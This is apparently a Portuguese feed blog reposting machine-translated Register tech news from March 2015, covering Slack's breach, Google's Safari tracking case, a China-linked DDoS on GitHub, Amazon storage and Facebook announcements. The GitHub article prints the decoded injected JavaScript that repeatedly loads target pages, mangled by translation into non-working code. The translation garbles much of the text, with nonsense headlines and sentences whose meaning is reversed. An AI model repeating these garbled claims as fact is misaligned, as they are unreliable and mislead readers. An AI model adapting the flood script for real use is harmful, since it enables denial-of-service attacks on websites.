Por quê? Porque ele não vê nada, mas de oportunidade. "Nós acreditamos que nós estamos olhando para 'compressão bruta' aqui", explica o sócio North Bridge Jim Moran, "onde a única coisa que mantém a empresa de ir além do seu atual crescimento de 100 por cento é uma habilidade para pisar no acelerador."


O dinheiro será gasto em grande parte em vendas e marketing e expansão de fora os EUA, com alguns acontecendo "fortificante" plataforma rica em recursos da empresa de modo súbito crescimento não se torne serviço desleixado.


Com um faturamento de um dígito em clientes, é tudo sobre a obtenção de novos clientes no. "Quanto mais rápido nós podemos converter, mais rápido podemos ir", entusiasma-se Moran. A empresa vai lançar o primeiro no Reino Unido e, em seguida, para a Europa.


Então, onde estão esses novos clientes vai vir? "O mercado é tão campo verde como é takeover plain", Moran afirma, "porque o [open source] movimento é tão grande."


North Bridge tem vindo a acompanhar o mercado de CMS de código aberto por algum tempo, depois de ter sido em cada rodada de financiamento para especialista em Drupal Acquia, começando com Série A, em 2007, até a Série F, em maio do ano passado, onde foi acompanhado por outros cinco, colocando em US $ 50 milhões (Amazon, em seguida, colocar em uma quantia não especificada em agosto).


Como WP Engine, Acquia oferece uma variedade de recursos no topo da CMS instalação básica que puxa para cima a commodity mercado de hospedagem, dando usuários sérios e empresas de confiança suficiente para usar o software de código aberto, em vez de confiar em produtos de gerenciamento de conteúdo proprietário.


E, investindo em WP Engine, a empresa VC senta-se em ambos os lados de um mercado de CMS open source que vê melhorias constantes em ambos Drupal e Wordpress, em grande parte provocada pela de outros mais recentes inovações (a cada 12 meses, você vai encontrar inúmeros posts do blog explicando por que eles estão se movendo de Wordpress para Drupal, ou Wordpress para Drupal, dependendo de onde estamos no ciclo de atualização).


Venham, venham todos


Moran vê novos clientes que vêm no topo do funil de três áreas: código aberto existente usuários do CMS infeliz com sua hospedagem atual ou que procuram intensificar ("o número um pedido é fácil de usar, em seguida, confiabilidade"); novos clientes que se deslocam ao longo de abrir CMSes fonte; e as pessoas que estão iniciando novos websites.


"Há agora é enorme penetração com móvel", destaca Moran. "Um site tornou-se porta da frente de todos, para um indivíduo ou uma empresa."


Ele admite que é especialista na expansão de novos domínios de nível superior - onde 1.000 novas palavras-ponto vai explodir o número de nomes de domínio possibilidades - mas diz que ele sabe "o suficiente para ser perigoso", e reflete a mesma filosofia dos líderes nesse mercado Registro: quando a maré sobe, ele levanta todos os barcos. Mais domínios é igual a mais websites equivale a mais de hospedagem.


O Motor WP não está fazendo é ir contra o mercado gigante de commodities - os GoDaddys, Wixes e até Rackspaces que visam cobrir tanto do mercado quanto possível e assim lutar fortemente de preço ao lidar com alta rotatividade de clientes.


Embora Moran afirma que as empresas tornam-se mais interessado nos gostos de WP Motor e Acquia que oferecem recursos completos, clientes fiéis, margens mais elevadas e excelente serviço e confiabilidade (WP Motor acaba de ganhar um prêmio Stevie para atendimento ao cliente).


Com sites tornando-se extremamente importante para cada vez mais um grande número de pessoas e empresas, a aposta é que US $ 29 por mês parece razoável para um site pessoal (em vez de, digamos, US $ 99 por ano), e US $ 249 por mês para um negócio vale a pena cada centavo se ele pode ser invocado para oferecer informações rápidas a todos e bom atendimento ao cliente para você.


Bem-vindo à hospedagem high-end. A internet está indo a lugar nenhum, mas para cima. ®







via Alimentação (Feed)

sexta-feira, 27 de março de 2015

Flak para rachaduras folga na app yak aba corte: base de dados do usuário ripado


Workplace bate-papo Slack app, popular entre West Coast descolados de inicialização, entre outros, foi invadido, seus criadores disseram hoje.


Vice-presidente Slack da política e da estratégia de cumprimento Anne Toth explicou como , durante um período de quatro dias, em fevereiro, os atacantes foram capazes de acessar um banco de dados contendo os nomes de conta, endereços de email, números de telefone, IDs Skype e hash de senhas de usuários Slack. A biz, fundada em 2013, só foi capaz de confirmar a intrusão "recentemente".





O serviço permite que os funcionários Slack para criar e gerenciar painéis de mensagens internas para projetos individuais e departamentos. Além de chats, os usuários podem compartilhar imagens, links e conteúdo de serviços como Twitter, Skype e Google Drive. Slack é uma startup com sede em San Francisco, e tem uma avaliação de US $ 1,2 bilhão.


Nenhuma informação financeira ou cartão de pagamento foi tocado pelos invasores de banco de dados, estamos disse. As mensagens e comunicações da equipe não se acredita que tenham sido acessados ​​por a maioria dos usuários.


Toth disse que enquanto não havia nenhuma indicação os hackers foram capazes de quebrar as senhas hash, atividade suspeita foi flagrado em um pequeno número de contas - presumivelmente os que usam senhas fracas. Slack já notificou essas pessoas, e redefinir suas senhas.


"Uma vez que o sistema comprometido foi descoberto pela primeira vez, temos vindo a trabalhar 24 horas por dia para examinar metodicamente, reconstruir e testar cada componente do nosso sistema para garantir que é seguro", Toth disse em um e-mail para Slack clientes.


"Estamos colaborando com especialistas externos para confrontarão pressupostos e garantir que estamos meticuloso em nossa abordagem. Além disso, temos notificado a aplicação da lei deste intrusão ilegal."


Para todos os usuários, um conjunto de novas opções de segurança serão oferecidos. Contas Slack agora vai oferecer autenticação de dois fatores através dos aplicativos Google Authenticator e Duo Mobile.


As proteções de dois fatores permitirá que os usuários recebem um código de um tempo de uso em seu telefone móvel para entrar com outras credenciais da conta. Autenticação de dois fatores não será obrigatório, mas é altamente recomendado por Slack.


Além disso, Slack estará oferecendo os líderes de equipe um recurso de "kill switch password" para reiniciar automaticamente as senhas para cada membro da equipe. A opção seria rescindido automaticamente sessões de usuário e exigem nova uma nova senha para cada membro da equipe. ®







via Alimentação (Feed)

Tribunal da Relação de bomba: Google deve enfrentar a justiça britânica por "espionagem Safari '


Apple Safari-usando Brits, que afirmam que eles foram acompanhados por adbots do Google sem permissão, pode processar o Google, o Tribunal de Recurso da Inglaterra e País de Gales se pronunciou.


"Esta é uma vitória de Davi e Golias", disse Marc Bradshaw, uma das três pessoas que tomam Google, um poderoso gigante da publicidade com sede em Mountain View, Califórnia, a tribunal na capital da Blighty.





"O Tribunal de Recurso assegurou Google não pode usar seus vastos recursos para escapar à justiça Inglês. Usuários de computadores comuns como eu, agora terá o direito de realizar este gigante de responder perante os tribunais para suas ações inaceitáveis, imorais e injustas".


Bradshaw e co acusam Google de forma injusta contornar as configurações de privacidade das pessoas no Safari, permitindo que o gigante das buscas para seguir usuários do Safari em torno da internet e mostrar-lhes publicidade personalizada.


Safari pode ser configurado para rejeitar cookies de um site a menos que haja uma interação com uma página web - por exemplo, Safari vai aceitar um cookie de login, se o usuário fizer logon em um fórum do site através de um formulário nome de usuário e senha.


Para contornar este problema de controle de privacidade, o Google falsificou um envio de formulário quando o navegador visitou um servidor executado pelo Google, efetivamente enganando Safari em aceitar cookies de rastreamento que identificaram os usuários, é reivindicado. A utilização desta técnica foi descoberto por um pesquisador de Stanford, e levou a pedidos de uma investigação da FTC e ações judiciais em os EUA e Reino Unido.


Bradshaw e seus companheiros, trabalhando sob a bandeira Grupo de Ação Google , estão tentando tomar o goliath Califórnia ao tribunal em Londres, alegando uma violação do seu direito à privacidade.


Google argumentou , sem sucesso, que o sistema judicial do Reino Unido não tinha competência, neste caso, e também pediu a demissão por motivo que ninguém sofreram prejuízos financeiros. Na sexta-feira, o tribunal rejeitou ambos os argumentos, e governou o caso terá de ser respondida.


"Estas alegações levantar questões sérias que merecem um julgamento", o tribunal de recurso afirmou.


"Dizem respeito que é acusado de ter sido o acompanhamento e verificação de informações secretas e cobertor, muitas vezes de natureza extremamente privado ... e associados com o uso de internet dos demandantes, bem como a utilização posterior de que a informação por cerca de nove meses. O caso relaciona-se com a ansiedade e angústia esta intrusão na autonomia causou ".


A decisão pode permitir que "milhões" de outros usuários da Apple que pegou os biscoitos furtivos entre o verão de 2011 e Primavera de 2012, para se juntar à luta legal, o trio disse, e seus advogados estão se preparando para a batalha.


"Google, uma empresa que faz bilhões a partir do conhecimento da publicidade, alega que não sabia que estava secretamente rastrear os usuários da Apple, por um período de nove meses e havia argumentado que nenhum dano foi feito porque o assunto era trivial que os consumidores não tinham perdido financeiramente, ", disse Dan Tench, sócio o advogado dos queixosos Olswang.


"O Tribunal de Recurso viu esses argumentos para o que são:. Uma violação dos direitos civis dos consumidores e acionáveis ​​perante os tribunais ingleses Estamos ansiosos para segurando Google para explicar suas ações."


Google não estava respondendo aos pedidos de comentário como nós apertar o botão de publicar. ®







via Alimentação (Feed)

O JavaScript injetado usado para esmagar anti-Great Firewall of China GitHub projetos off-line


Servidores do GitHub estão sendo martelado pelo tráfego web de um exército de inconscientes ciber-soldados de infantaria.


Ela aparece quando milhares de pessoas visitam sites que veiculam anúncios e código de acompanhamento do Baidu - resposta da China ao Google - de fora do Reino Médio, gateways de rede na fronteira chinesa silenciosamente injetar uma função JavaScript em páginas desses sites.





Este código simples conecta repetidamente e furtivamente para GitHub.com a cada dois segundos, criando "uma quantidade extremamente grande de tráfego", disse o arrivista baseada em San Francisco.


A JS visa especificamente dois projetos GitHub hospedados - Greatfire e CN-NYTimes - que ajudam os cidadãos chineses contornar o Grande Firewall da China . O firewall bloqueia coisas como VPNs tráfego e censores web, escondendo informações sobre o massacre da Praça Tiananmen e assim por diante.


GitHub , disse na sexta-feira que as rajadas de tráfego, de forma eficaz uma seqüência de distribuídos de negação de serviço-ataques, estão causando interrupções intermitentes.


"Estamos cientes de que GitHub.com é intermitentemente indisponível para alguns usuários durante os DDoS em curso", disse o GitHub em uma atualização de status em 1549 UTC de hoje.


"O serviço para todos os usuários Restaurando enquanto desviando tráfego de ataque é a nossa prioridade número um. Temos implantado nossas defesas contra ataques volumétricos uma quantidade extremamente grande de tráfego. O desempenho é de estabilização."


Horas antes, o biz observou: "Estamos sob ataque DDoS contínua por mais de 24 horas O ataque está a evoluir, e estamos todas as mãos no convés atenuante.".



A interrupção ... atualizações de status do GitHub hoje



De acordo com um pesquisador de segurança na introspecção Labs , as solicitações HTTP para hm.baidu.com/h.js estão sendo sequestrado por passagens fronteiriças da China, o que inserir alguns JavaScript semi-ofuscado para atacar os repositórios GitHub acima mencionados. O script injetado parece com isso, uma vez descodificado:



document.write ("<script src =" http://ift.tt/1aR0QCs "> // <! [CDATA [
\ X3C / script> ");
! Window.jQuery && document.write ("<script src = 'http: //code.jquery.com/jquery-latest.js'> \ X3C / script>");
Startime = (new Date) .getTime ();
contagem var = 0;

função unixtime () {
var a = new Date;
retornar Date.UTC (a.getFullYear (), a.getMonth (), a.getDay (), a.getHours (), () a.getMinutes, a.getSeconds ()) / 1E3
}
url_array = ["http://ift.tt/1IEOAXq;, "http://ift.tt/1IEOzCO;];
NUM = url_array.length;

função r_send2 () {
var a = unixtime ()% NUM;
get (url_array [a])
}

função get (a) {
var b;
$ .ajax ({
url: um,
dataType: "script",
timeout: 1E4,
cache: 0,
beforeSend: function () {
requestTime = (new Date) .getTime ()
},
completar: function () {
ResponseTime = (new Date) .getTime ();
b = Math.floor (ResponseTime - requestTime);
3E5> ResponseTime - Startime && (r_send (b), a contagem + = 1)
}
})
}

função r_send (a) {
setTimeout ("r_send2 ()", a)
}
setTimeout ("r_send2 ()", 2E3);

O projeto Greatfire fornece links para espelhos hospedados em nuvem de sites - como a BBC e Blogger do Google - que o povo chinês pode usar para esquivar-se do Grande Firewall. Enquanto BBC.com é bloqueado , um cache de páginas da emissora em cloudfront.net não é, parece. CN-NYTimes espelha de forma semelhante ao New York Times.


"Um determinado dispositivo na fronteira da rede interna da China e da Internet seqüestrou as conexões HTTP entrou na China, substituiu alguns arquivos javascript do Baidu com os maliciosos que carregam [as páginas GitHub] a cada dois segundos," Anthr do Insight Labs '@ x escreveu.


"Em outras palavras, mesmo as pessoas fora da China estão a ser transformado em arma para atingir coisas que o governo chinês não gosta, por exemplo, a liberdade de expressão."


Enquanto não há nenhuma prova de que o governo chinês estava diretamente envolvido no assalto, outros pesquisadores, como Mikko Hypponen da F-Secure, notou que alguém, estado ou de outra forma, quer estes projectos silenciadas. ®








via Alimentação (Feed)

Euro reactor termonuclear projeto está em apuros


O projeto Internacional Thermonouclear Experimental Reactor é em água quente com o Parlamento Europeu por não gerenciar os fundos da UE corretamente.


Orçamentais deputados da Comissão de Controlo do Parlamento esta semana desaconselhadas aprova 2.013 gastos por pessoal do ITER devido a atrasos de pagamento e crescente custos orçamentais .





Embora a Comissão Europeia é responsável pela gestão do orçamento da União Europeia, todos os gastos devem ser aprovados pelo Parlamento em um "processo de quitação" anual, quando os deputados verificar se os fundos da UE foram gastos de acordo com as regras.


O Instituto Europeu de Inovação e Tecnologia (EIT) também não conseguiu a primeira rodada do teste de "descarga", porque os deputados não estavam satisfeitos com a sua verificação dos pagamentos antes e depois de projetos contratados. Os deputados também questionou o uso do EIT de procedimentos por-somente para convidados de contratos públicos.


ARTEMIS baseado em Estocolmo (agora renomeada componentes eletrônicos e sistemas para a liderança europeia), projeto de nano-eletrônica ENIAC (Conselho Consultivo Initiative Nanoelectronics Europeia) e da Iniciativa sobre Medicamentos Inovadores (IMI) todos tiveram aprovação do orçamento adiada para verificações suficientes sobre as transferências de dinheiro.


As recomendações da comissão será submetida a votação por todo o Parlamento entre 28 e 30 de Abril. Parlamento vai tomar a sua decisão final sobre as descargas adiada em outubro. ®







via Alimentação (Feed)

Tim Cook: Eu vou dar apenas um terço do que Gates, deu para a caridade no ano passado


CEO da Apple, Tim Cook confirmou que ele está a entregar a sua relativamente desprezível fortuna para a caridade para a melhoria do planeta - uma vez que ele é pago bill faculdade do sobrinho.


Este não é algum tipo de golpe publicitário para reforçar a imagem da Apple como um designer benevolente tecnologia. Hacks de baixo calão em publicações menores pode sugerir isso, mas não nós, oh não. Cozinhe apenas se preocupa com todos nós.





"Você quer ser a pedra no lago que cria uma onda de mudança", disse ele em um bajulador perfil .


Cook está estimada para ter uma fortuna pessoal de US $ 785m - uma quantidade irrisória ofuscado pelo $ 30.2bn que Bill Gates já entregou para combater a doença e educação reforma. Mas parece Gates, não pode dar as verdinhas afastado rápido o suficiente - no ano passado ele fez US $ 3 bilhões e US $ 2,6 bilhões ostentaram em boas causas.


A fortuna pessoal de CEO da Apple inclui US $ 120 milhões em ações da Apple e ações restritas avaliado em US $ 665m se fosse para ser totalmente investido. Ele já começaram a semear a grana, mas vai doar o lote para fora uma vez os seus dez anos de idade relativa é totalmente instruídos.


Aparentemente cozinheiro quer "desenvolver uma abordagem sistemática à filantropia ao invés de simplesmente passar cheques".


As fileiras de executivos do Vale do Silício e os provenientes de outras indústrias falar publicamente sobre suas atividades filantrópicas está crescendo. Fat cat financista Warren Buffet pediu anteriormente bilionários a doar metade de sua riqueza antes de acabar com ele através do Dar Pledge website.


Luzes principais da indústria de tecnologia, incluindo Gates, do CEO do Facebook, Mark Zuckerberg, curtido perma Playboy co-fundador da Oracle Larry Ellison, telco empresário John Caudwell e Tesla biggie Elon Musk já se inscreveram.


Apple tinha esculpido uma imagem como um azarão que luta contra a máquina Microsoft. Agora que é a empresa mais valiosa do planeta, com uma capitalização de mercado ao norte de US $ 700 bilhões , isso não jogar tão bem.


Talvez cozinheiro deve usar seu poder e influência para dar mais concessões aos trabalhadores em fábricas do Extremo Oriente que constroem kit da Apple, que reclamou das condições de trabalho hediondos.


Ou talvez a Apple poderia simplesmente parar de evitar imposto sobre as sociedades - que, embora legal, chama a críticas de quem não pode mover a sua riqueza em todo o mundo para evitar entregá-lo para o Fisco.


A Apple negociou um acordo com o governo irlandês que lhe permitiu pagar uma taxa de dois por cento.


A empresa também tem mais de cem bilhões de dólares fora os EUA que não querem repatriar por causa de implicações fiscais. ®







via Alimentação (Feed)

Microsoft realiza reverter full-hybrid com uma torção no local


A Microsoft fez algumas mudanças para os seus serviços de backup Azure Site Recovery e Azure.


O item manchete é a capacidade de "ativar a proteção e recuperação de desastres para máquinas virtuais VMware e servidores físicos para Azure." Isso é um tiro através da curva da VMware, como faz o mesmo em sua própria nuvem vCloud Air e prega a integração no local-a-nuvem de um único controle aberração como a forma como fazer as coisas. Microsoft está tentando comer seu almoço.





Azure Backup também foi dado um impulso. A ferramenta é faturado como uma ferramenta de backup nublado bastante genérico: ele é executado na nuvem e utiliza agentes para desviar e dados VMS para a segurança da nuvem.


Microsoft da empresa adicionou a capacidade de servidores de backup em IaaS Azure backup. Explicado aqui , o novo recurso significa Azure Backup irá descobrir o que os servidores que estejam em execução no Azure IaaS, instalar um agente sobre eles, em seguida, aplicar as políticas de backup preferencial para levá-los para a nuvem.


Qual é o lugar onde as coisas começam a ficar interessantes, de acordo com Veeam. A empresa tem visto um novo recurso chamado "Snapshot Extensão" que ele diz que "é projetado para permitir que fornecedores de software independentes (ISVs) acesso em nível de imagem para os dados do instantâneo de backup Azure VM".


How Azure Backup for IaaS VMs works


De Veaam Anton Gostev pensa que um grande negócio, pois "... abre praticamente infinitas capacidades, incluindo backup do Azure VMs para voltar ao seu ambiente local."


Por que alguém iria querer uma cópia de segurança no local de uma nuvem de VM quando a nuvem é tão confiável que não sysadmin que se preze se preocupar com a sua própria plataforma de backup? Porque, Gosteve aponta, as nuvens vão de dados para baixo ou corruptos. E quando o fazem, você vai estar se sentindo muito presunçoso se você teve a clarividência de usar Ye Olde no local ƃackup para adicionar uma camada extra de proteção.


Gostev também aponta que os custos de armazenamento nublados pode rastejar para cima se os usuários manter assinalando cada caixa, então a chance de enviar algum tipo de armazenamento de volta para o seu próprio celeiro pouco vai ajudar nisso.


O post de Veeam não diz quando ele vai começar a usar Snapshot Extensão em seus produtos, mas é claro que a empresa gosta muito da característica e é footling com ele para uma versão futura. ®







via Alimentação (Feed)

quinta-feira, 26 de março de 2015

Google botches outro patch nuvem, desta vez bagunçar App Engine


Google da fracassada outro patch nuvem.


Operações de nuvem da fábrica de chocolate têm um tempo difícil de coisas este ano, sofrendo uma bagunça rede em fevereiro e, em seguida, uma queda de energia no início de março.





Ao longo dos últimos dois dias, o App Engine da empresa experiente "503 erros elevadas em <1% dos pedidos de duração típica de 50 minutos." Não é um aborrecimento colossal, para ter certeza, mas como Google diz-se de um relatório sobre o incidente "Nós sabe como é importante alto tempo de atividade e baixas taxas de erro são para você e seus usuários ".


Aqui está a explicação do Google de causa raiz do evento:


"Um erro latente no código de manipulação de quota App Engine foi disparado durante uma atualização de software de rotina do sistema de cotas. Isso resultou na App Engine retornando over-quota erros para algumas aplicações que não eram mais de quota. Como App atualizações de software do motor estiverem implantadas progressivamente, apenas algumas aplicações foram afetados pela atualização antes que o problema foi detectado e corrigido. "

Google diz que vai "... adicionar monitoramento e alerta para a emissão de cotas que resultou em espúrios 503 erros, criar um novo protocolo de resposta rápida para lidar com respostas erradas de cotas, e irá modificar o comportamento quota aplicação de tolerar o comportamento do sistema de quotas romance com menor aplicação impacto. "


A nova edição sugere que nem todas as partes do negócio nuvem do Google adotaram o novo plano de preparação pré-patch que se comprometeu a adotar na sequência dos dois incidentes anteriores mencionados acima.


Tudo o que pode ou não pode torná-lo mais confiante sobre como usar o novo Google Launcher, anunciou na quinta-feira, o que oferece a oportunidade de "lançar mais de 120 populares pacotes de código aberto que foram configurados por BitNami ou Google Clique para implantar."


A nova oferta não parece ser algo que vai ter gente como da Pivotal Cloud Foundry tremendo em suas botas (não menos importante porque introduziu desova simples de AWS esta semana), mas parece uma maneira acessível para girar instâncias de desenvolvimento comum ambientes e aplicações. Barra de lançamento do lançador é aqui , se você sentir vontade de iniciar uma contagem regressiva. ®







via Alimentação (Feed)

Poderes do Vale do Silício: Deixe espionagem massa morrer maio 2015 - que é ruim para a privacidade (e negócios)


Apple, Microsoft, Facebook, Google, Yahoo! - E muitos, muitos outros - têm apelado para políticos americanos e G-homens para conter a vigilância digital em massa em maio deste ano, e trazer a comunidade de inteligência sob algum tipo de supervisão eficaz.


"Já se passaram quase dois anos desde que as primeiras notícias revelaram o âmbito das actividades de vigilância e recolha de grandes quantidades dos Estados Unidos", escreveu o grupo em uma carta aberta [PDF] ao presidente Obama, os líderes do Congresso, e os chefes da NSA e do Departamento de Justiça dos EUA.





"Agora é o momento de assumir as reformas legislativas significativas para os programas de vigilância do país que mantêm a segurança nacional, preservando a privacidade, transparência e prestação de contas."


E, provavelmente, evitar futuras manchetes irritantes como este e este aparecer na web.


Os goliaths tecnologia são membros da coalizão de Vigilância Governo Reforma , juntamente com a pró-privacidade e guerreiros de direitos civis. O grupo foi acumulando a pressão sobre espionagem global, que dizem que fere os seus negócios. Em sua mais recente carta aberta, a chamada gangue para a reforma do Patriot Act EUA , que terá que ser renovado em breve.


No dia 31 de maio deste ano, a Seção 215 da Lei (ou dar-lhe o seu nome completo e um tanto ridícula, a união e fortalecimento América, fornecendo ferramentas adequadas para Interceptar e Obstruir Terrorism Act) expira. Seção 215 é a parte da lei anti-terror que a NSA usa para justificar bisbilhotando em metadados telefone de todos.


O grupo está pressionando que a secção podem caducar em 1 de Junho, sem ser reauthorized. seção 214 , que abrange registros de caneta e dispositivos de interceptação e de rastreamento, também irá expirar nessa data. O grupo diz que, se eles são renovadas, uma supervisão adequada é necessário por uma terceira parte independente.


Com as seções do Patriot Act chegando para a renovação, não há uma quantidade crescente de pressão para conter a espionagem cobertor revelado pelo denunciante Edward Snowden. No início desta semana, um projeto de lei bipartidário foi introduzida na Câmara dos Deputados para abolir o Patriot Act por completo, mas El Reg suspeita Satanás ir trabalhar em um limpa-neve, antes de passar. ®







via Alimentação (Feed)

Amazon cloud ameaça desafiar as leis da física fundamental


Amazon espera Knacker seus adversários no mundo da nuvem, oferecendo armazenamento on-line sem fim para uma taxa anual fixa.


Por US $ 12 por ano internautas pode armazenar um número "infinito" de fotos nos servidores da Amazon no âmbito do novo Plano Ilimitado Fotos, junto com 5GB de armazenamento para outros tipos de arquivos. Os US $ 60 por ano Ilimitado Tudo Plano oferece armazenamento ilimitado de quase qualquer tipo de arquivo, estamos disse.





(Amazon está claramente apostando no universo é infinito. Nós nos perguntamos se da CIA Amazon construído US $ 600 milhões centro de dados magicamente detém uma quantidade infinita de dados, também.)


"A maioria das pessoas têm uma vida útil de aniversários, férias, feriados e momentos diários armazenados em vários dispositivos. E, eles não sabem quantos gigabytes de armazenamento que precisa fazer backup de todos eles", disse Josh Petersen, diretor da Amazon Cloud Drive.


"Com os dois novos planos que estão introduzindo hoje, os clientes não precisam se preocupar com espaço de armazenamento - eles agora têm uma solução acessível, seguro para armazenar quantidades ilimitadas de fotos, vídeos, filmes, músicas e arquivos em um lugar conveniente. "


Há, é claro, algumas ressalvas. Os arquivos não podem ser maiores que 2 GB, por isso não há uploads de filmes em HD, e certos tipos de conteúdo estão fora - incluindo pornografia e material pirateado. Amazon também quer que os usuários se certificar de que nenhum malware fica carregado, mas o gigante norte-americano não disse como pretende procurar bytes desertor.


Amazon do pontapé de saída do serviço com um teste gratuito de três meses para todos os usuários. Você vai precisar de um cartão de crédito para se inscrever. Cancelar o serviço e você tem 30 dias para obter os seus dados off seus sistemas.


O anúncio lobs uma bomba no mercado de armazenamento em nuvem. Enquanto empresas como Dropbox oferece armazenamento ilimitado para usuários de negócios, as pessoas em casa geralmente tem que pagar uma quantia significativa para backups na nuvem.


Um terabyte de armazenamento do iCloud custa R $ 20 por mês, enquanto a mesma quantidade na unidade do Google será fixado de volta $ 10 a cada 30 dias. Usuários do Office 365 da Microsoft fizer armazenamento ilimitado , com o mais barato plano de US $ 7 por mês. Amazon superando os seus rivais irão causar-lhes dores de cabeça e, com base na experiência do passado, uma guerra de preços.


Isso é uma boa notícia para você e eu, mas uma má notícia para as empresas menores, como Dropbox que não estão indo para ser feliz sobre a execução de armazenamento em nuvem em uma perda. Afigura-se que pode haver uma extorsão no mercado vinda. ®







via Alimentação (Feed)

Facebook processado: Data center projetos 'cortado' for Open Compute


Facebook está sendo processado em os EUA por uma biz Reino Unido, que reivindica Zuckerberg & Co roubou seus planos para centros de dados.


BladeRoom Grupo acusa a gigante das redes sociais roubou segredos comerciais e de propriedade intelectual sobre formas de instalar armazéns pré-fabricadas, modulares de servidores.





Especificamente, BladeRoom alega Facebook levou suas idéias e entregou-os ao Projeto OpenCompute levou-FB , uma iniciativa que "dá ao público" o pleno acesso às especificações dos utilizados pelo Facebook em seus centros de dados ", de acordo com o pedido do tribunal.


BladeRoom diz que em janeiro de 2014, o Projeto OpenCompute (OCP) apresentou IP de BladeRoom como a sua própria, depois de ter reembalado-lo como algo chamado " rápida datacenter implantação ". A empresa britânica também diz Facebook ganhou um contrato para construir um pré-fabricado, modular do centro de dados, com base em suas idéias, a Emerson Network Power na Suécia maio 2014.


Emerson Network Power não é uma festa para o caso. Não há nenhuma sugestão de que Emerson intencionalmente infringiu a propriedade intelectual da BladeRoom na construção do Facebook Luleå prédio 2 do centro de dados .


BladeRoom - referidos como BRG em documentos judiciais [PDF] - entrou com uma ação no tribunal federal em San Jose no Distrito Norte da Califórnia. A denúncia - apresentado em 23 de março - é fortemente redigido.


"Em janeiro 2014 ... Facebook anunciou ao mundo que havia desenvolvido um novo método revolucionário de construção de missão crítica, grandes centros de dados", afirma o claim. Ele continua:


Facebook alegou que desenvolveu uma abordagem inovadora de construção, pré-fabricada e modular e, exaltando seus benefícios, incentivou a indústria datacenter inteiro para mudar de práticas tradicionais para este novo método. O Facebook não revelou, no entanto, era que esta metodologia e do know-how detalhada apoiar seu uso tinha de fato sido roubado pelo Facebook a partir de BRG.

De acordo com a apresentação, o Facebook decidiu nessa reunião janeiro "para incentivar e induzir outros a usar a propriedade intelectual da BRG bem ao revelar informações confidenciais da BRG." O processo alega ainda Facebook continuou a incentivar os outros a usar o seu novo "rápida dados de implementação center" em um post no blog março 2014.


BladeRoom diz que contatou Facebook em outubro de 2011 sobre o seu design modular pré-fabricado e técnicas de transporte e de construção.


Também envolvido no caso é uma segunda empresa britânica chamada Bripco, que licencia sua tecnologia e projetos para BladeRoom.


BladeRoom está à procura de danos e honorários jurídicos abrangidos. Ela quer reparação pela alegada violação da boa-fé, apropriação indevida de segredos comerciais, enriquecimento sem causa, a seu cargo, práticas comerciais desleais e de concorrência desleal.


BladeRoom não quis comentar mais quando contactado pelo The Register. Facebook não estava disponível para comentar o assunto no momento da escrita.


Fundada em 2008, BladeRoom constrói, centros de dados eficientes em termos de energia modulares, alegando um PUE (Power Usage Effectiveness) de 1,13, em uma escala onde 1.0 é o teoricamente melhor desempenho. Data center pues são geralmente 1,5 ou mais.


A empresa tem trabalhado em sistemas de produção de alimentos em larga escala, locais urbanos e remotos, e trabalhou em instalações para os três últimos Jogos Olímpicos.


Esta é a segunda vez que o Facebook tem sido acusado de pisar em patentes de outras pessoas do centro de dados. Yahoo! Alegou em 2012 que o Facebook tinha violado até 16 patentes que cobrem publicidade, privacidade, personalização do site, redes sociais e comunicação integrada em redes sociais. Facebook contra-atacou, contra-processando mais de dez de suas patentes. As empresas instaladas no mesmo ano, entrando no que eles chamaram um acordo "estratégico" que não envolvem pagamentos em dinheiro. ®







via Alimentação (Feed)

quarta-feira, 25 de março de 2015

Quando vai começar a conversar sobre ROBÔS WhatsApp? Não segure a respiração, diz co-fundador


F8 2015 Por mais que os desenvolvedores podem querer WhatsApp para publicar APIs para permitir que outro software para acessar seu serviço de bate-papo popular, a subsidiária Facebook não tem planos de fazer isso.


Essa é a palavra de WhatsApp cofundador Brian Acton, que subiu ao palco na conferência de desenvolvedores do Facebook F8, em San Francisco na quarta-feira para participar de um painel de discussão com os executivos do Facebook e do companheiro aquisição Facebook Instagram.





Quando um membro da platéia perguntou se WhatsApp liberaria APIs, Acton timidamente respondeu: "Não é de hoje."


Não foi até a segunda pessoa da platéia perguntou uma variante da mesma pergunta que Acton admitiu que a empresa "não tem planos" para oferecer APIs públicas no presente.


A razão? Por mais que as empresas possam querer o acesso a 700 milhões de usuários do WhatsApp, a empresa se preocupa que nem todos os desenvolvedores que querem enviar mensagem com WhatsApp terá motivos nobres.


"Recebemos muitas solicitações de pessoas que querem gerir os seus negócios ou executar algo usando WhatsApp para as comunicações", Acton explicou. "Nossa preocupação é que não queremos que os usuários recebendo mensagens que eles não querem. Nós não necessariamente quer a zumbir telefone de uma pessoa só porque nós podemos."


WhatsApp ponderou criar algum tipo de interface de programação para WhatsApp, Acton disse, mas no final ele decidiu se concentrar em manter a qualidade da experiência do usuário, ao invés de fazer WhatsApp em um backbone para todos os tipos de mensagens automatizadas.


Os comentários de Acton veio no mesmo dia em que o Facebook disse que vai fornecer aos desenvolvedores maior acesso ao Messenger, o seu app de chat caseiro, com uma nova oferta chamado Plataforma Mensageiro .


WhatsApp continua a ser o mais popular dos dois serviços, no entanto, e Acton disse que a empresa está focada no crescimento de sua base de usuários ainda mais.


"Nossa prioridade imediata é que cobre o mundo com grandes comunicações", disse ele. ®







via Alimentação (Feed)

Facebook espera devs vai 'Like' SDKs como móveis, Graph API ter esfregado up


F8 2015 Facebook tem usado a ocasião de sua conferência de desenvolvedores F8, em San Francisco este ano para a implantação de uma grande atualização para seus kits de desenvolvimento de software para Android e iOS, além de uma nova versão da API para acessar seus dados do gráfico social.


"Esta é a nossa primeira grande atualização para o iOS e Android SDKs em mais de dois anos", escreveu Facebook engenheiro Harshdeep Singh em um post anunciando os novos lançamentos. "Nós passamos o ano passado a falar com a nossa comunidade de desenvolvedores sobre como podemos facilitar suas vidas, então nós reconstruímos nossos SDKs para reflectir o seu feedback."





Os novos SDK, cada um dos quais é a versão 4.0, são descritos como sendo "totalmente reconstruído."


Dentre as principais alterações, o novo SDK introduz melhores modelos de programação para logins e compartilhar coisas no Facebook, além de melhor tratamento de erros e recuperação.


Desenvolvedores do Android agora podem rodar a otimização de código ProGuard e ferramenta de compressão através de seus projetos inteiros, resultando em aplicações menores.


O IOS SDK, por outro lado, tem sido dividido em um pequeno grupo de bibliotecas separadas, que também podem resultar em aplicações de menor dimensão. No lado negativo, a versão 4.0 não suporta mais o iOS 6 - assim aplicativos que usam ele não será executado no iPhone 3GS ou mais cedo ou no quarto ou anteriores gerações do iPad.


